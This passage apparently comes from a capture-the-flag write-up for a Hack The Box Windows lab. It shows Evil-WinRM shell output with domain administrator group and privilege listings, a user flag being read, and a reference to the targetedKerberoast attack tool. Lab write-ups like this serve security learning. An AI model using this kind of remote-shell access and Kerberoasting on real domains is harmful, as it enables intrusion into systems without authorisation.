Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.63.212
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami /all

USER INFORMATION
----------------

User Name                   SID
=========================== ===========================================
administrator\administrator S-1-5-21-1088858960-373806567-254189436-500


GROUP INFORMATION
-----------------

Group Name                                           Type             SID                                         Attributes
==================================================== ================ =========================================== ===============================================================
Everyone                                             Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                               Alias            S-1-5-32-544                                Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                        Alias            S-1-5-32-545                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access           Alias            S-1-5-32-554                                Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                                 Well-known group S-1-5-2                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                     Well-known group S-1-5-11                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                       Well-known group S-1-5-15                                    Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Group Policy Creator Owners            Group            S-1-5-21-1088858960-373806567-254189436-520 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Domain Admins                          Group            S-1-5-21-1088858960-373806567-254189436-512 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Schema Admins                          Group            S-1-5-21-1088858960-373806567-254189436-518 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Enterprise Admins                      Group            S-1-5-21-1088858960-373806567-254189436-519 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Denied RODC Password Replication Group Alias            S-1-5-21-1088858960-373806567-254189436-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication                     Well-known group S-1-5-64-10                                 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                 Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

Read flag: user.txt

*Evil-WinRM* PS C:\Users\emily> cd Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> dir


    Directory: C:\Users\emily\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2024   2:23 PM           2308 Microsoft Edge.lnk
-ar---        11/28/2024   9:52 PM             34 user.txt


*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
f16efd243f78a5bd60813461c244859b
*Evil-WinRM* PS C:\Users\emily\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.63.212
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1
*Evil-WinRM* PS C:\Users\emily\Desktop> whoami /all

USER INFORMATION
----------------

User Name                   SID
=========================== ===========================================
administrator\administrator S-1-5-21-1088858960-373806567-254189436-500


GROUP INFORMATION
-----------------

Group Name                                           Type             SID                                         Attributes
==================================================== ================ =========================================== ===============================================================
Everyone                                             Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                               Alias            S-1-5-32-544                                Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                        Alias            S-1-5-32-545                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access           Alias            S-1-5-32-554                                Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                                 Well-known group S-1-5-2                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                     Well-known group S-1-5-11                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                       Well-known group S-1-5-15                                    Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Group Policy Creator Owners            Group            S-1-5-21-1088858960-373806567-254189436-520 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Domain Admins                          Group            S-1-5-21-1088858960-373806567-254189436-512 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Schema Admins                          Group            S-1-5-21-1088858960-373806567-254189436-518 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Enterprise Admins                      Group            S-1-5-21-1088858960-373806567-254189436-519 Mandatory group, Enabled by default, Enabled group
ADMINISTRATOR\Denied RODC Password Replication Group Alias            S-1-5-21-1088858960-373806567-254189436-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication                     Well-known group S-1-5-64-10                                 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                 Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

References

[Password Safe](https://sourceforge.net/projects/passwordsafe/)
[targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast)
